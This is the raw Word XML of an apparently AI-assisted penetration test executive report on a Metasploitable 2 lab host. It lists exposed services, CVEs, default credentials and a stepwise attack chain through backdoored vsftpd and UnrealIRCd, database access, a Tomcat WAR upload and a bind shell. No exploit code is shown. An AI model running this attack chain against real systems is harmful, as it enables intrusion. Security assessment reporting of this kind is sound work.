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0" w:before="2400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D2137"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTIVE REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="400" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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6026"/>
      </w:tblGrid>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Target System</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192.168.64.2</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Report Date</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21 May 2026</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Assessment Type</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Black-Box Penetration Test (AI-Assisted)</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Scan Profile</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Ports 1–10000</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Tool Used</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PentestMCP v2.1 (AI-Assisted)</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Risk Score</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bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10.0 / 10  ●  CRITICAL</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Open Ports</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26</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Total CVEs Found</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73  (Critical: 7  |  High: 15  |  Medium: 18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="1B4F72" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="60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tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">25 confirmed Metasploit modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6026"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B03030"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL — FOR AUTHORISED RECIPIENTS ONLY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  THIS DOCUMENT CONTAINS SENSITIVE SECURITY INFORMATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribute only to personnel with a need to know. Store securely.</w:t>
      </w:r>
    </w:p>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1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A comprehensive penetration test was conducted against the target host 192.168.64.2 using PentestMCP v2.1, an AI-assisted automated penetration testing framework. The assessment covered all TCP ports from 1 to 10,000 and included network scanning, service enumeration, vulnerability identification, exploit verification, and web application testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The findings are severe. The target system — identified as Metasploitable 2 — presents a composite risk score of 10.0/10, the maximum possible. Twenty-six network services are exposed, 73 Common Vulnerabilities and Exposures (CVEs) were identified, and 25 confirmed Metasploit exploit modules are applicable. Multiple services contain known backdoors (vsftpd 2.3.4, UnrealIRCd 3.2.8.1) that provide instant unauthenticated root access. A motivated attacker with basic tooling could achieve full system compromise in under five minutes from first contact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This system must not be connected to a production network or any environment containing sensitive data. Immediate remediation of all CRITICAL findings is required before any further use.</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5"/>
        <w:gridCol w:w="1805"/>
        <w:gridCol w:w="1805"/>
        <w:gridCol w:w="1805"/>
        <w:gridCol w:w="1806"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1805"/>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Open Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1805"/>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Critical CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1805"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0511B" w:sz="4"/>
              <w:left w:val="single" w:color="C0511B" w:sz="4"/>
              <w:bottom w:val="single" w:color="C0511B" w:sz="4"/>
              <w:right w:val="single" w:color="C0511B" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="C0511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High CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1805"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="9A6D0A" w:sz="4"/>
              <w:left w:val="single" w:color="9A6D0A" w:sz="4"/>
              <w:bottom w:val="single" w:color="9A6D0A" w:sz="4"/>
              <w:right w:val="single" w:color="9A6D0A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="9A6D0A"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Medium CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1806"/>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Exploit Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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1B4F72"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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E67E22"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1805"/>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9A6D0A"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2E7D32"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">25</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1.1 Overall Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Score: 10.0 / 10  —  CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following factors drove the maximum risk rating:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple services with known, publicly documented backdoors (vsftpd, UnrealIRCd)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unauthenticated remote code execution available on at least 8 services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Default and empty credentials across MySQL, PostgreSQL, VNC, Tomcat, and Telnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-installed root shell on port 1524 (Metasploitable backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">25 applicable Metasploit modules — exploitation requires no custom tooling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">15 confirmed XSS PoCs and SQL injection on the web application layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No evidence of network segmentation, access control lists, or intrusion detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Recommended Attack Path (AI Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The AI engine identified the following optimal attack chain for a threat actor:</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500"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="3526"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3526"/>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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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vsftpd 2.3.4 backdoor (CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Instant root shell on port 6200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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UnrealIRCd backdoor (CVE-2010-2075)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Shell as IRC daemon user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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MySQL empty root password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Full DB access, credential dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:5432</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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PostgreSQL default creds → COPY PROGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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OS-level command execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Tomcat Manager WAR upload (default creds)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.64.2:1524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Pre-opened bind shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Immediate root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2. Discovered Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following 26 network services were discovered. All services are accessible from the network without host-based firewall restrictions.</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700"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="3326"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Version / Banner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3326"/>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CVE(s)</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21</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FTP</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vsftpd 2.3.4</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CVE-2011-2523</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22</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SSH</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OpenSSH 4.7p1 Debian 8ubuntu1</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23</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Telnet</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Linux telnetd</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CVE-2021-27171, CVE-2000-1195, CVE-2022-39028</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25</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SMTP</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Postfix smtpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7D6608"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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CVE-2005-0337, CVE-2023-51764</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53</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DNS (BIND)</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ISC BIND 9.4.2</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CVE-2008-0122, CVE-2008-4163</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80</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HTTP</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Apache httpd 2.2.8 / PHP 5.2.4</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CVE-2020-5504</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111</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RPCbind</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rpcbind v2</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139</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Samba (SMB)</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Samba smbd 3.X-4.X</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CVE-2017-7494</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445</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Samba (SMB)</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Samba smbd 3.X-4.X</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CVE-2017-7494</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512</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rexec</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netkit-rsh rexecd</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513</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rlogin</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OpenBSD rlogind</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514</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rsh</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TCP-wrapped</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1099</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Java RMI</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GNU Classpath grmiregistry</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1524</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Bindshell</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Metasploitable root shell</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2049</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NFS</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NFS 2-4</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2121</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FTP</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ProFTPD 1.3.1</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CVE-2009-0542</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3306</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MySQL</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MySQL 5.0.51a-3ubuntu5</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CVE-2009-2446</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3632</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DistCC</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distccd v1</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CVE-2004-2687</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5432</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PostgreSQL</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PostgreSQL 8.3.0–8.3.7</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CVE-2007-3278</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5900</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VNC</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VNC (password: password)</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CVE-2002-2088, CVE-2006-4309</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6000</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X11</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X11 TCP open</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6667</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IRC (UnrealIRCd)</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UnrealIRCd 3.2.8.1</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CVE-2010-2075</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6697</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IRC (UnrealIRCd)</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UnrealIRCd 3.2.8.1</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CVE-2010-2075</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8009</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AJP / Tomcat</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Apache Jserv (Ghostcat)</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CVE-2020-1938</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8180</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Apache Tomcat</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Tomcat/Coyote JSP 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2009-3843</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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8787</w:t>
            </w:r>
          </w:p>
        </w:tc>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Ruby DRb RMI</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6"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Ruby DRb RMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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33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7F8C8D"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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3. Vulnerability Intelligence — Critical CVEs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following section details the seven Critical and most impactful High CVEs, including full descriptions, business impact analysis, kill-chain escalation paths, and remediation commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
